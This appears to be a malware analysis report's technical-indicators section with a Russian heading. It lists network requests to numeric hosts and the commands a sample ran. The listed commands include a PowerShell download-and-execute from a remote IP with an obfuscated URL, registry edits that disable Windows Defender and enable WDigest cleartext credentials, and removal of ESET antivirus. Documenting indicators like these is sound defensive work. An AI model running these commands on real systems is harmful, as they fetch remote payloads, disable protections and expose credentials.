Техническая информация
- (htqtp://173.208.139.170:8170/abc.txt -replace q
- %TEMP%\95.211.190.198_10.0.49.28_microsoft windows 7 enterprise [6.1.7601]_10%.txt
- http://17#.###.139.170:8170/abc.txt via 17#.#08.139.170
- http://ip.###l.chinaz.com/
- http://17#.###.139.170:8170/batpower.txt via 17#.#08.139.170
- http://16#.##.180.175:8175/kill.txt via 16#.#8.180.175
- http://16#.##.180.175:8175/uninstall.txt via 16#.#8.180.175
- DNS ASK ip.###l.chinaz.com
- DNS ASK ev######.ws.symantec.com
- '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(('htqtp://173.208.139.170:8170/abc.txt' -replace 'q',''));
- '%WINDIR%\syswow64\cmd.exe' /c reg add ВЎВ°HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows DefenderВЎВ± /v ВЎВ°DisableAntiSpywareВЎВ± /d 1 /t REG_DWORD /f
- '%WINDIR%\syswow64\reg.exe' add ВЎВ°HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows DefenderВЎВ± /v ВЎВ°DisableAntiSpywareВЎВ± /d 1 /t REG_DWORD /f
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\cmd.exe' /c del %WINDIR%\system\system.exe
- '%WINDIR%\syswow64\wbem\wmic.exe' product where "name like '%Eset%'" call uninstall /nointeractive